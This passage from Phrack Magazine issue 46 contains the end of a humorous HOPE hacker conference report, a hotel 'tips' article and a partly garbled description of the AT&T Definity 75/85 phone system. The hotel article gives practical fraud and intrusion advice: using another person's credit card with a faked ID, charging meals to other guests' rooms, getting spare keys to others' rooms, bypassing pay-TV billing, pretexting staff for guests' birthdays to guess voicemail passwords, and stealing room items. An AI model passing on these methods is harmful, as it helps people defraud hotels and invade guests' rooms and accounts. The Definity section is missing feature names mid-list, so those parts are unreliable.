there who are forever needing long distance voice service from
|
|||
|
the Whattownisthis, USA airport, Sprint thinks they have a better
|
|||
|
mousetrap. No more messing finger entry. No more pass-codes or
|
|||
|
PIN's.
|
|||
|
|
|||
|
I remember at the Washington National Airport last summer I was
|
|||
|
using my Cable and Wireless long distance access card and entered
|
|||
|
the PIN and to my surprise, an automated voice came on and said,
|
|||
|
"Sorry, you entered your PIN with the wrong finger. Please try
|
|||
|
again."
|
|||
|
|
|||
|
Sprint says they've solved this thorny cumbersome problem with a
|
|||
|
service called "The Voice Fone Card". Instead of memorizing
|
|||
|
another 64 digit long PIN, you just speak into the phone: "Hi,
|
|||
|
it's me. Give me dial tone or give me death." The voice recog
|
|||
|
nition circuits masturbate for a while to determine if it's
|
|||
|
really you or not.
|
|||
|
|
|||
|
Good idea. But according to Strat, not a good execution. Strat
|
|||
|
found that someone performing a poor imitation of his voice was
|
|||
|
enough to break through the front door with ease. Even a poor
|
|||
|
tape recording played back over a cheap cassette speaker was
|
|||
|
sufficient to get through Sprint's new whiz-banger ID system.
|
|||
|
|
|||
|
Strat laughed that Sprint officials said in defense, "We didn't
|
|||
|
say it was secure: just convenient."
|
|||
|
|
|||
|
Smart. Oh, so smart.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
"If my generation of the late 60's and early 70's had had the
|
|||
|
same technology you guys have there never would have been an
|
|||
|
80's." This was how I opened my portion of the author's panel.
|
|||
|
|
|||
|
The authors panel was meant to give HOPE hackers insight into how
|
|||
|
they are perceived from the so-called outside. I think the
|
|||
|
session achieved that well, and I understand the videos will be
|
|||
|
available soon.
|
|||
|
|
|||
|
The question of electronic transvestites on AOL came up to every
|
|||
|
one's enjoyment, and all of us on the panel retorted with a big,
|
|||
|
"So what?" If you have cyber-sex with someone on the 'Net and
|
|||
|
enjoy it, what the hell's the difference? Uncomfortable butt
|
|||
|
shifting on chairs echoed how the largely male audience likely
|
|||
|
feels about male-male sex regardless of distance.
|
|||
|
|
|||
|
"Imagine," I kinda said, "that is a few years you have a body
|
|||
|
suit which not only can duplicate your moves exactly, but can
|
|||
|
touch you in surprisingly private ways when your suit is connect
|
|||
|
ed to another. In this VR world, you select the gorgeous woman
|
|||
|
of choice to virtually occupy the other suit, and then the two of
|
|||
|
you go for it. How do you react when you discover that like
|
|||
|
Lola, 'I know what I am, and what I am is a man and so's Lola.'"
|
|||
|
Muted acknowledgment that unisex may come to mean something
|
|||
|
entirely different in the not too distant future.
|
|||
|
|
|||
|
"Ooh, ooh, please call on me." I don't mean to be insulting, but
|
|||
|
purely for identification purposes, the woman behind the voice
|
|||
|
bordered on five foot four and four hundred pounds. Her bathtub
|
|||
|
had stretch marks.
|
|||
|
|
|||
|
I never called on her but that didn't stop her.
|
|||
|
|
|||
|
"I want to know what you think of how the democratization of the
|
|||
|
internet is affected by the differences between the government
|
|||
|
and the people who think that freedom of the net is the most
|
|||
|
important thing and that government is fucked but for freedom to
|
|||
|
be free you have to have the democracy behind you which means
|
|||
|
that the people and the government need to, I mean, you know, and
|
|||
|
get along but the sub culture of the hackers doesn't help the
|
|||
|
government but hackers are doing their thing which means that the
|
|||
|
democracy will not work , now I know that people are laughing and
|
|||
|
giggling (which they were in waves) but I'm serious about this
|
|||
|
and I know that I have a bad case of hypomania but the medication
|
|||
|
is working so it's not a bad as it could be. What do you think?"
|
|||
|
|
|||
|
I leaned forward into the microphone and gave the only possible
|
|||
|
answer. "I dunno. Next." The thunderous round of applause
|
|||
|
which followed my in-depth response certainly suggested that my
|
|||
|
answer was correct. Not politically, not technically, but anar
|
|||
|
chistically. Flexibility counts.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
HOPE was attended by around one thousands folks, and the Hotel
|
|||
|
Filthadelphia still stands. (Aw shucks.)
|
|||
|
|
|||
|
My single biggest complaint was not that the schedules slipped by
|
|||
|
an hour or two or three; sessions at conferences like this keep
|
|||
|
going if the audience is into them and they are found to be
|
|||
|
educational and productive. So an hour session can run into two
|
|||
|
if the material and presentations fit the mood. In theory a
|
|||
|
boring session could find itself kama kazi'd into early melt-down
|
|||
|
if you have the monotone bean counter from hell explaining the
|
|||
|
distributed statistical means of aggregate synthetic transverse
|
|||
|
digitization in composite analogous integral fruminations.
|
|||
|
(Yeah, this audience would buy off on that in a hot minute.) But
|
|||
|
there were not any bad sessions. The single track plenary style
|
|||
|
attracted hundred of hackers for every event. Emmanuel and
|
|||
|
friends picked their panels and speakers well. When dealing with
|
|||
|
sponge-like minds who want to soak up all they can learn, even in
|
|||
|
somewhat of a party atmosphere, the response is bound to be good.
|
|||
|
|
|||
|
My single biggest complaint was the registration nightmare. I'd
|
|||
|
rather go the DMV and stand in line there than get tagged by the
|
|||
|
seemingly infinite lines at HOPE. At DefCon early registration
|
|||
|
was encouraged and the sign up verification kept simple.
|
|||
|
|
|||
|
For some reason I cannot thoroughly (or even partially) fathom, a
|
|||
|
two step procedure was chosen. Upon entering, and before the
|
|||
|
door narcs would let anyone in, each attendee had to be assigned
|
|||
|
a piece of red cardboard with a number on it. For the first day
|
|||
|
you could enter the 'exhibits' and auditorium without challenge.
|
|||
|
But by Day 2 one was expected to wait in line for the better part
|
|||
|
of a week, have a digital picture taken on a computer tied to a
|
|||
|
CCD camera, and then receive a legitimate HOPE photo-ID card.
|
|||
|
What a mess. I don't have to beat them up on it too bad; they
|
|||
|
know the whole scheme was rotten to the core.
|
|||
|
|
|||
|
I waited till near the end of Day 2 when the lines were gone and
|
|||
|
the show was over. That's when I got my Photo ID card. I used
|
|||
|
the MIB's photo ID card the rest of the time.
|
|||
|
|
|||
|
HOPE was a lot of fun and I was sorry to see it end, but as all
|
|||
|
experiences, there is a certain amount of letdown. After a great
|
|||
|
vacation, or summer camp, or a cruise, or maybe even after Wood
|
|||
|
stock, a tear welts up. Now I didn't cry that HOPE was over, but
|
|||
|
an intense 48 hours with hackers is definitely not your average
|
|||
|
computer security convention that only rolls from 9AM to Happy
|
|||
|
Hour. At a hacker conference, you snooze, you lose. You never
|
|||
|
know what is going to happen next - so much is spontaneous and
|
|||
|
unplanned - and it generally is highly educational, informative
|
|||
|
and entertaining.
|
|||
|
|
|||
|
Computer security folks: you missed an event worth attending.
|
|||
|
You missed some very funny entertainment. You missed some fine
|
|||
|
young people dressed in some fine garb. You missed the chance to
|
|||
|
meet with your perceived 'enemy'. You missed the opportunity to
|
|||
|
get inside the heads of the generation that knows more about
|
|||
|
keyboards than Huck Finning in suburbia. You really missed
|
|||
|
something, and you should join Robert MIB Steele and I at the
|
|||
|
next hacker conference.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
If only I had known.
|
|||
|
|
|||
|
If only I had known that tornadoes had been dancing up and down
|
|||
|
5th avenue I would have stayed at the Hotel Filthadelphia for
|
|||
|
another night.
|
|||
|
|
|||
|
La Guardia airport was closed. Flights were up to 6 hours de
|
|||
|
layed if not out and out canceled. Thousands of stranded travel
|
|||
|
ers hunkered down for the night. If only I had known.
|
|||
|
|
|||
|
Wait, wait. Hours to wait. And then, finally, a plane ready and
|
|||
|
willing to take off and swerve and dive between thunderbolts and
|
|||
|
twisters and set me on my way home.
|
|||
|
|
|||
|
My kids were bouncing out of the car windows when my wife picked
|
|||
|
me up at the airport somewhere in the vicinity of 1AM.
|
|||
|
|
|||
|
"Not too late are you dear?" Sweet Southern Sarcasm from my
|
|||
|
Sweet Southern Wife.
|
|||
|
|
|||
|
"Don't blame me," I said in all seriousness. "It was the hack
|
|||
|
ers. They caused the whole thing."
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Notice: This article is free, and the author encourages responsi
|
|||
|
ble widespread electronic distribution of the document in full,
|
|||
|
not piecemeal. No fees may be charged for its use. For hard
|
|||
|
copy print rights, please contact the author and I'll make you an
|
|||
|
offer you can't refuse. The author retains full copyrights to
|
|||
|
the contents and the term Cyber-Christ.
|
|||
|
|
|||
|
Winn is the author of "Terminal Compromise", a novel detailing
|
|||
|
a fictionalized account of a computer war waged on the United
|
|||
|
States. After selling well as a book-store-book, Terminal Com
|
|||
|
promise was placed on the Global Network as the world's first
|
|||
|
Novel-on-the-Net Shareware and has become an underground classic.
|
|||
|
(Gopher TERMCOMP.ZIP)
|
|||
|
|
|||
|
His new non-fiction book, "Information Warfare: Chaos on the
|
|||
|
Electronic Superhighway" is a compelling, non-technical analy
|
|||
|
sis of personal privacy, economic and industrial espionage and
|
|||
|
national security. He calls for the creation of a National
|
|||
|
Information Policy, a Constitution in Cyberspace and an Elec
|
|||
|
tronic Bill of Rights.
|
|||
|
|
|||
|
He may be reached at INTER.PACT, 11511 Pine St., Seminole,
|
|||
|
FL. 34642. 813-393-6600, fax 813-393-6361, E-Mail:
|
|||
|
P00506@psilink.com.
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 24 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
|
|||
|
The ABCs of better H O T E L Staying ...
|
|||
|
|
|||
|
... by SevenUp (sec@escape.com)
|
|||
|
|
|||
|
This ARTICLE will give you some information on how to experience
|
|||
|
a cheaper, safer, and more comfortable stay at your next hotel visit.
|
|||
|
Always keep in mind that the staff is taught to make your stay
|
|||
|
as pleasant as possible and fulfil most of your wishes. So it is often
|
|||
|
a matter of social engineering to reach your goal.
|
|||
|
|
|||
|
BUSINESS CENTRES
|
|||
|
Many good hotels offer business centres. Some business centres just offer
|
|||
|
"typing service" at high rates, others provide a PC you can use for free.
|
|||
|
Usually it is a 286 or older, but it should give you the opportunity
|
|||
|
to copy warez, write your latest article for Phrack or even connect your
|
|||
|
pocket modem and login to the -> Internet.
|
|||
|
|
|||
|
CREDIT CARDS
|
|||
|
If you have your own card and don't mind paying for the room - great!
|
|||
|
Just use it when you check in - most places require you to have a credit
|
|||
|
card or won't let you use the phone or won't even let you in.
|
|||
|
You want to use someone else's card? Be careful! Don't use a stolen
|
|||
|
card when you check in, or you won't have a safe sleep, fearing that they
|
|||
|
could come and get you. You would be safer if you tell them upon check in
|
|||
|
that you misplaces your card and don't need to make long distance calls,
|
|||
|
and just want to pay with it in the end. This doesn't work always, but
|
|||
|
sometimes. You also need a faked ID upon check in with the same name as
|
|||
|
the cardholder.
|
|||
|
|
|||
|
But overall, using a faked Credit Card in a hotel is one of the easiest ways
|
|||
|
to get busted.
|
|||
|
|
|||
|
DIALUPS
|
|||
|
Many hotels have dialins for their reservation system. Novells are quite
|
|||
|
popular. Some hotels also use PC based UNIXes (old System V's mostly)
|
|||
|
that are often unprotected - no passwords on the root account or even
|
|||
|
giving you a shell prompt when you call the dialup. Most of them are 7e1
|
|||
|
at slow speeds. I won't say more about reservation systems here.
|
|||
|
|
|||
|
EATING & DANCING
|
|||
|
Many hotels have good and relatively expensive restaurants and discos.
|
|||
|
They just require you to sign the check with a room number and full name.
|
|||
|
If you know of a guest that is checked in and has secured his account with
|
|||
|
a credit card who just checked in, just use his name and room number -
|
|||
|
this is probably the biggest lack of security in a hotel.
|
|||
|
|
|||
|
Also if you don't stay at the hotel but want to go to their disco at night,
|
|||
|
pretend to be a guest to get in free and save cover charges. They usually
|
|||
|
believe you.
|
|||
|
|
|||
|
FUCKING
|
|||
|
You've read right, hotels are favorite places to make love. No matter
|
|||
|
if you bring your IRC date here, pick up a hooker or stay alone and
|
|||
|
watch the in-house porn movies. Since many hotels pride themselves in
|
|||
|
having as much staff as guests, the question is how to get the cute
|
|||
|
waitresses and maids into your bed. If anyone has experience making
|
|||
|
them willing without much financial and physical effort, drop me a
|
|||
|
mail and I will include it in the next list.
|
|||
|
|
|||
|
GET ALL
|
|||
|
Some people love to take all movable parts from the room before checking
|
|||
|
out. The question is what to take and what not.
|
|||
|
|
|||
|
The easiest things to take are soaps, shampoo, lotions and Kleenex from
|
|||
|
the bathroom, since they will be replaced every morning without problems.
|
|||
|
If you want a bathrobe (usually most expensive item), hide it in your
|
|||
|
suitcase immediately after check in and then complain that there was just
|
|||
|
one robe in your room. They will bring you a new one immediately. If you
|
|||
|
take one when you leave the hotel, they will notice and most likely
|
|||
|
charge you $100 in your credit card. If you want a bath towel, also don't
|
|||
|
wait until the end of your stay, but hide it some days earlier. If anyone
|
|||
|
should ask about it, just tell him that you left it at the pool.
|
|||
|
Taking magazines from your room is usually no problem, but stay away
|
|||
|
from removing the TV or blankets!
|
|||
|
|
|||
|
HYATT GOLD PASSPORT
|
|||
|
If you want to check in at a Hyatt, get yourself their Gold Pass before.
|
|||
|
It is free of charge and will get you free Orange Juice, Coffee and a
|
|||
|
newspaper in the morning, and also a bigger room.
|
|||
|
|
|||
|
INTERNET
|
|||
|
So you are at a hotel in a new city and want to get on the Internet?
|
|||
|
There are usually 2 ways: Using a computer and a modem from your hotel room
|
|||
|
and calling a dialup, or walking to a local university and logging in from
|
|||
|
there.
|
|||
|
|
|||
|
If you bring your laptop with built-in modem, find the dialup in the
|
|||
|
Internet Dialup list in this issue of Phrack, get an account on the host
|
|||
|
and can make free local calls from your room, the first choice is probably
|
|||
|
the best one.
|
|||
|
|
|||
|
But if you don't have your own account at a local school and want to
|
|||
|
stay legit, it is often useful to walk to a computer lab in that school
|
|||
|
and check out their computers. Many school around the world have PC's
|
|||
|
in their labs which let you do a telnet throughout the world without
|
|||
|
needing any account or password, or ID to enter the school. You can find
|
|||
|
them in Hong Kong, New York, Munich and many other major cities; but usually
|
|||
|
they are unknown to the public or are likely to be closed down (similar to the
|
|||
|
vending machines, see -> SEVENUP).
|
|||
|
|
|||
|
JACKING OFF
|
|||
|
See -> Fucking.
|
|||
|
|
|||
|
KEY
|
|||
|
There are plenty of different types of room keys. Some hotels still use
|
|||
|
old-fashioned standard keys, but most use programmable keys (plastic cards
|
|||
|
with "holes" or magnetic stripes, or even the pretty modern metal keys
|
|||
|
in key-shape, which allow programming of their magnetic fields. These
|
|||
|
programmable keys will always be reprogrammed if a guest checks out.
|
|||
|
On the other hand, if you go to the reception and claim that you lost
|
|||
|
your key, they will always program a spare key for you. Sometimes they
|
|||
|
ask you for your birthday, sometimes for your ID (just tell them you
|
|||
|
left it in your room). This way you could easily get into someone else's
|
|||
|
room.
|
|||
|
|
|||
|
LIGHT
|
|||
|
Some hotels have quite fancy light systems. If the light won't shine,
|
|||
|
there is often a box in the entrance where you have to enter your key
|
|||
|
(or some paper) to activate the main power. This should help saving
|
|||
|
energy while you are gone, but sometimes even the air condition will
|
|||
|
turn off, so you have to fool the box with a paper or spare key.
|
|||
|
Some systems will turn on certain lights just when you insert the key
|
|||
|
into the door and open it. This is quite unfortunate if your roommate
|
|||
|
sleeps while you go cruising and clubbing at night. When you return,
|
|||
|
the light will shine bright and wake him up. The only thing that helps
|
|||
|
is unscrewing the light bulbs.
|
|||
|
|
|||
|
MOVIES & TV
|
|||
|
I bet many of you will first turn on the TV after entering the room.
|
|||
|
Some people just stay at hotels that offer HBO in their rooms.
|
|||
|
Before playing with the remote, read the papers above the TV carefully,
|
|||
|
because some channels might show in-house movies that are being charged
|
|||
|
automatically without any warning. Typical rates are US $6-9 per movie.
|
|||
|
Of course you don't want to pay that much, nor do I.
|
|||
|
|
|||
|
Here are the 3 big S' of movie watching:
|
|||
|
Spectravision, Sex movies and Social Engineering.
|
|||
|
|
|||
|
Spectravision is one of the most popular systems. It usually allows you
|
|||
|
to watch 5 minutes (sometimes 2) of each movie per day free, enough for
|
|||
|
some people to come. There are usually a bunch of BNC cables from the
|
|||
|
wall to your Spectravision box and to your TV. One of the cables delivers
|
|||
|
the program, the other assures billing. Use your fantasy and try replacing
|
|||
|
the "billing cable" in the wall! Generally it can also be useful to use
|
|||
|
a standard cable decoder (cablebox) to decode the pay channels. Just bring
|
|||
|
one along and if you are lucky, you can watch the movies easily.
|
|||
|
|
|||
|
If all your technical expertise fails, there is still one way of watching
|
|||
|
movies for free: Social Engineering. Just watch the movies of your choice
|
|||
|
and then complain to the reception that you had trouble with the TV,
|
|||
|
that the Spectravision box or remote control broke, or that you caught
|
|||
|
the maid watching movies in your room. If you cry a lot, they will usually
|
|||
|
be nice and remove the movies from your bill.
|
|||
|
|
|||
|
PHONE CALLS
|
|||
|
Be careful before making any phone calls from your room. Many hotels
|
|||
|
charge you up to $3 for 800 numbers and log all your touch tones (and
|
|||
|
calling codez!). You can't be sure who will view the logs and abuse your
|
|||
|
calling card. Also there are often high surcharges for long distance calls,
|
|||
|
up to 40% on top of AT&T's operator connected charges. There are also hotels
|
|||
|
that charge a minimum charge per call (up to $5), even if you just talked
|
|||
|
for 10 seconds long distance. On the other side, some hotels offer free local
|
|||
|
and 800 calls. Just make sure and read all papers in the room and contact
|
|||
|
the reception. I also had operators telling me lower rates than the ones that
|
|||
|
showed up on my bill, so be careful.
|
|||
|
|
|||
|
RACK RATE
|
|||
|
This is the highest possible rate for a room, and the rate that is officially
|
|||
|
displayed at the reception. You should never pay that rate. If you say you
|
|||
|
are with a company they will give you a discount of at least 10% (corporate
|
|||
|
rate). Some hotels even give qualified people and companies discounts of
|
|||
|
25% - 50% on the rack rate. When you wonder if you pay too much for your
|
|||
|
room or think you got a great rate, send me a mail, because I try to keep
|
|||
|
a database about cheapest prices for selected hotels.
|
|||
|
|
|||
|
SEVENUP, Coke, Pepsi & Rootbeer:
|
|||
|
You are staying at a five-star hotel. You are thirsty. Your room has
|
|||
|
a minibar, but the cheapest soda is $4.95. The next supermarket or gas
|
|||
|
station is 20 miles away. But you need a Coke. What to do now?
|
|||
|
|
|||
|
TRY finding the gangways where the employers work, live and eat!
|
|||
|
About every bigger hotel has a kitchen for employees. They also have
|
|||
|
a vending machine hidden somewhere, with sodas for just 60 cents.
|
|||
|
|
|||
|
When strolling through the restricted area, just walk straight, slowly
|
|||
|
and self confident. If someone asks you what you are doing, tell them:
|
|||
|
a) you are an undercover agent for the IRS and they should get lost.
|
|||
|
b) you are looking for the vending machine. (telling the truth openly
|
|||
|
with a broad smile can be more successful than you think!)
|
|||
|
c) you are a new employee and ask her to show you around
|
|||
|
|
|||
|
Also notice the signs and posters in most restricted areas, telling
|
|||
|
the personnel to be "enthusiastic, punctual, generous to the guest..."
|
|||
|
Quote these phrases when an employer behaves nasty towards you.
|
|||
|
|
|||
|
UPGRADES
|
|||
|
After first going into your room and checking it out, go back to
|
|||
|
the reception and complain that the bed is too small, the street noise
|
|||
|
is too loud, the view is too poor, etc. Quite often they will give you
|
|||
|
a nicer and bigger room on their executive floor! See also -> Hyatt
|
|||
|
Gold Passport.
|
|||
|
|
|||
|
VOICE MAIL
|
|||
|
Many good hotels offer voice mail to their guests. The most popular
|
|||
|
system is Meridian Mail. Some hotels have an own dialup for the voicemail,
|
|||
|
but mostly the hotel just lets you access it through the main PBX operator.
|
|||
|
If you are unlucky you have to wait 5 rings at a number before the
|
|||
|
Voice Mail answers.
|
|||
|
|
|||
|
Most guests don't use Voice Mail. The few that do also keep the default
|
|||
|
password, which is often the room number or the birthday of the guest.
|
|||
|
One way to get the birthday is call up front desk, tell them you are
|
|||
|
with "Mommy's Birthday Cakes Delivery" and have a cake for John Smith.
|
|||
|
Ask them to check birthday's of all John Smith's etc. Of course there
|
|||
|
are more ways, just use your social engineering fantasy!
|
|||
|
|
|||
|
WHERE TO GO?
|
|||
|
It is pretty hard to recommend chains in general. But I had quite
|
|||
|
good experience with Hilton, Hyatt (try getting a room on the Regency
|
|||
|
floor), Holiday Inn (sometimes really cheap prices and good standard),
|
|||
|
Shangri-La (best hotels in Asia) and Marriott (usually nice service).
|
|||
|
I had less good experience with Sheraton (less discounts), Peninsula,
|
|||
|
Regent & Four Seasons (all a bit overpriced and not so modern). But
|
|||
|
there are always exceptions, so tell me about your experience!
|
|||
|
|
|||
|
|
|||
|
I hope some of these tips might be useful for you. Stay tuned and wait
|
|||
|
for a new issue of travel tips, next time about Airlines!
|
|||
|
|
|||
|
|
|||
|
(c)opyright 1994 by the author. Publication outside of Phrack forbidden.
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 25 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
|
|||
|
================================
|
|||
|
AT&T Definity System 75/85
|
|||
|
Communications System
|
|||
|
Description & Configuration
|
|||
|
================================
|
|||
|
Written By: erudite
|
|||
|
(armitage@dhp.com)
|
|||
|
=====
|
|||
|
Intro
|
|||
|
=====
|
|||
|
|
|||
|
Let me introduce you to the AT&T Definity System 75/85. This communications
|
|||
|
system is a product of the merging of the AT&T System 75 and System 85
|
|||
|
architectures. The name Definity came from the two words "definitive" and
|
|||
|
"infinity".
|
|||
|
|
|||
|
Let me also tell you that there are many different communications systems
|
|||
|
out there. (Merlins, AT&Ts) Many many many, I couldn't name them all, but
|
|||
|
the AT&T systems are nice. I enjoy working with them, and I hope you enjoy
|
|||
|
this text file.
|
|||
|
|
|||
|
This System is an advanced business communications system. A Digital
|
|||
|
Communications Protocol (DCP) allows data communication through data
|
|||
|
terminal equipment connected to the digital switch. This allows the
|
|||
|
system to handle data and voice communications simultaneously.
|
|||
|
|
|||
|
The System can handle up to 1600 lines that supports all digital, hybrid,
|
|||
|
and analog terminals and equipment. Up to 400 trunks, and up to 400
|
|||
|
Automatic Call Distribution (ACD) Agents. The Data switching capacity is up
|
|||
|
to 800 digital data endpoints, and 160 integrated and combined pooled modem
|
|||
|
facilities.
|
|||
|
|
|||
|
~ 510D Personal Terminal or 515-Type Business Communications Terminal
|
|||
|
~ 7404D Terminals
|
|||
|
~ 7406D or 7407D Equipped with optional Data Module Base
|
|||
|
~ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
|
|||
|
~ Digital Terminal Data Modules
|
|||
|
~ 3270 Data Modules
|
|||
|
~ Internal Data Channels
|
|||
|
~ Trunk Data Modules (Modular)
|
|||
|
~ Processor Data Modules (Modular)
|
|||
|
|
|||
|
==========
|
|||
|
Networking
|
|||
|
==========
|
|||
|
|
|||
|
The Processor Port Network (PPN) always provides the switch processing
|
|||
|
element (SPE) and port circuits. An Expansion Port Network (EPN) is
|
|||
|
available to increase line size of any system by allowing you to add
|
|||
|
additional port circuits. The EPN connects to the PPN over a fiber
|
|||
|
optic cable that may be up to 1.86 miles remotely situated. It may also
|
|||
|
by located adjacent to the PPN.
|
|||
|
|
|||
|
This System may be arranged stand-alone or you can integrate it into a
|
|||
|
private network. You can form these types of Networks:
|
|||
|
~ Tandem Tie Trunk Network (TTTN)
|
|||
|
~ Electronic Tandem Network (ETN)
|
|||
|
~ Main/Satellite Configuration
|
|||
|
~ Distributed Communications System (DCS)
|
|||
|
~ Centralized Attendant Service (CAS)
|
|||
|
|
|||
|
An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
|
|||
|
makes it possible for the Definity System to access various private and
|
|||
|
public network services. With ISDN-PRI the you can access these services:
|
|||
|
~ Call by Call Service Selection
|
|||
|
~ Private Network Services
|
|||
|
~ Information Forwarding
|
|||
|
~ Call Identification Display
|
|||
|
- Connected Number Display
|
|||
|
- Connected Party Name Display
|
|||
|
- Calling and Called Number Record Display
|
|||
|
- Calling and Called Party Name Display
|
|||
|
|
|||
|
=============
|
|||
|
Configuration
|
|||
|
=============
|
|||
|
|
|||
|
The Actual System is encased in a pair of "cabinets" which have a fiber
|
|||
|
optic link between them. It is also common to have a stack of about three
|
|||
|
"cabinets" of a smaller size, for different models.
|
|||
|
|
|||
|
Shown here is a typical multi-carrier system with a Processor Port Network
|
|||
|
(PPN) cabinet and Expansion Port Network (EPN) cabinet.
|
|||
|
|
|||
|
attendant outside trunks _____ outside private line
|
|||
|
consoles and lines / data transmission equipment or
|
|||
|
\ \ / analog switched network
|
|||
|
\ fiber optic | |
|
|||
|
| connection | | __ business communication
|
|||
|
-+---------/~\--------+--+ / terminals
|
|||
|
| AT&T | | AT&T | |
|
|||
|
| DEFINITY | | DEFINITY +------' ___data
|
|||
|
---+ SYSTEM | | SYSTEM +--------<>------[audix] / terminals
|
|||
|
/ | 75/85 | | 75/85 | modular data /
|
|||
|
| |___________| |__________+| processor ____ |
|
|||
|
manager | | | | +'optional host
|
|||
|
terminal | | +-------<>----------+ | computer or call
|
|||
|
/ +-------[]-----+, |____| management system
|
|||
|
/ asynchronous |
|
|||
|
single line data unit \__ data
|
|||
|
voice terminals terminals
|
|||
|
|
|||
|
|
|||
|
===================
|
|||
|
Voice and Data
|
|||
|
Management Features
|
|||
|
===================
|
|||
|
|
|||
|
There are a lot of voice features and services, in fact, too many to list, I
|
|||
|
will do a run down on all the interesting and useful features and services.
|
|||
|
It has many Voice Management, Data Management, Network Services, System
|
|||
|
Management, Hospitality Services, and Call Management Services.
|
|||
|
|
|||
|
call attendant can use to operate the console more efficiently
|
|||
|
both inside system users and remote callers to edit, receive, send,
|
|||
|
write, and forward voice messages.
|
|||
|
system.
|
|||
|
it to the display console.
|
|||
|
- Attendant Conference: Allows Attendant to construct a conference call
|
|||
|
- Terminal Conference: Allows remote user to construct a conference call
|
|||
|
without attendant assistance.
|
|||
|
being interrupted by any of the systems overriding features, and denies
|
|||
|
ability to gain access to, and or superimpose tones.
|
|||
|
is issued by the administrator to a certain extension # for indication of
|
|||
|
a dedicated private data extension.
|
|||
|
the system to dial anyone else, such as the attendant console.
|
|||
|
the following trunks and more.
|
|||
|
~ Voice Grade DS1 Tie Trunks
|
|||
|
~ Alternative Voice/Data (AVD) DS1 Tie Trunks
|
|||
|
~ Digital Multiplexed Interface (DMI) Tie Trunks
|
|||
|
~ Central Office (CO) Trunks
|
|||
|
~ ISDN-PRI Trunks
|
|||
|
~ Remote Access Trunks
|
|||
|
~ Wide Area Telecommunications Service (WATS) Trunks
|
|||
|
features and functions that is used for maintenance testing. Such as access
|
|||
|
to system tones, access to specific trunks, etc.
|
|||
|
Note: AT&T designed the Facility Test Calls Feature for testing
|
|||
|
purposes only, and system maintenance. When properly
|
|||
|
administered, AT&T claims that the customer is responsible for
|
|||
|
all security items, and secure system from unauthorized users,
|
|||
|
and that all users should be aware of handling access codes.
|
|||
|
AT&T claims they will take no responsibility for poor
|
|||
|
administration.
|
|||
|
it rings down if busy, or if it receives a dial timeout.
|
|||
|
packet switched local area network that will link with mainframes,
|
|||
|
workstations, personal computers, printers, terminals, storage devices,
|
|||
|
and communication devices.
|
|||
|
This interface allows connection of the system to an ISDN Network by means
|
|||
|
of ISDN frame format called PRI.
|
|||
|
branch has a Listed Directory Number (LDN).
|
|||
|
~ Common Control Switching Arrangement (CCSA)
|
|||
|
~ Electronic Tandem Network (ETN)
|
|||
|
~ Enhanced Private Switched Communications Service (EPSCS)
|
|||
|
~ Tandem Tie Trunk Network (TTTN)
|
|||
|
~ Software Defined Network (SDN)
|
|||
|
doesn't want to take responsibility for anything that is abused with this
|
|||
|
feature.
|
|||
|
would come in handy.
|
|||
|
others calls, again, AT&T does not want to take any legal fees on misuse
|
|||
|
on this feature.
|
|||
|
attendant's assistance.
|
|||
|
|
|||
|
========
|
|||
|
Software
|
|||
|
========
|
|||
|
|
|||
|
The System comes with switched services software, administrative software,
|
|||
|
and maintenance software. All running on a real-time operating system.
|
|||
|
|
|||
|
and services. This also is responsible for relaying any information to the
|
|||
|
console display.
|
|||
|
tasks, and configurations.
|
|||
|
keep everything running properly.
|
|||
|
|
|||
|
=====================
|
|||
|
System Administration
|
|||
|
=====================
|
|||
|
|
|||
|
The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
|
|||
|
number. The pound (#) and star (*) keys can be used as the first digit of the
|
|||
|
code. Below you will see a typical Screen Format taken from one of my logs,
|
|||
|
information aside you can see and get a feel of what the administration side of
|
|||
|
the system is like. Page 1 of 4
|
|||
|
|
|||
|
STATION
|
|||
|
|
|||
|
Extension: ____
|
|||
|
Type: _____ Lock Messages: _ COR: _ Room: _____
|
|||
|
Port: ___________ Security Code: ____ COS: _ Jack: _____
|
|||
|
Name: ___________ Coverage Path: ___ Cable: _____
|
|||
|
|
|||
|
FEATURE OPTIONS
|
|||
|
|
|||
|
LWC Reception? _____ Headset? _ Coverage Msg Retrieval? _
|
|||
|
LWC Activation? _ Auto Answer? _ Data Restriction? _
|
|||
|
Redirect Notification? _ Idle Appearance Preferences? _
|
|||
|
PCOL/TEG Call Alerting? _
|
|||
|
Data Module? _ Restrict Last Appearance? _
|
|||
|
Display? _
|
|||
|
|
|||
|
ABBREVIATED DIALINGS
|
|||
|
|
|||
|
List1: _____ List2: _____ List3: _____
|
|||
|
|
|||
|
BUTTON ASSIGNMENTS
|
|||
|
|
|||
|
1: _______ 6: _______
|
|||
|
2: _______ 7: _______
|
|||
|
3: _______ 8: _______
|
|||
|
4: _______ 9: _______
|
|||
|
5: _______
|
|||
|
|
|||
|
|
|||
|
==================
|
|||
|
System Maintenance
|
|||
|
==================
|
|||
|
|
|||
|
Finally the Maintenance section, where you can see where the errors are
|
|||
|
logged, where all the alarms are sent, printed, etc.
|
|||
|
|
|||
|
There are 3 different types of alarms:
|
|||
|
console or INADS)
|
|||
|
|
|||
|
The Error log is reported and can be viewed at The Manager Terminal,
|
|||
|
as well as the alarm log.
|
|||
|
|
|||
|
==============
|
|||
|
Basic Acronyms
|
|||
|
==============
|
|||
|
|
|||
|
ADU Asynchronous Data Unit
|
|||
|
AUDIX Audio Information Exchange
|
|||
|
COR Class of Restriction
|
|||
|
COS Class of Service
|
|||
|
DCP Digital Communications Protocol
|
|||
|
DMI Digital Multiplexed Interface
|
|||
|
EPN Expansion Port Network
|
|||
|
ISDN Integrated Service Digital Network
|
|||
|
PPN Processor Post Network
|
|||
|
PSDN Packet Switching Data Network
|
|||
|
|
|||
|
=====
|
|||
|
Tones
|
|||
|
=====
|
|||
|
|
|||
|
Here is most of the Tones, mostly either interesting ones or often used
|
|||
|
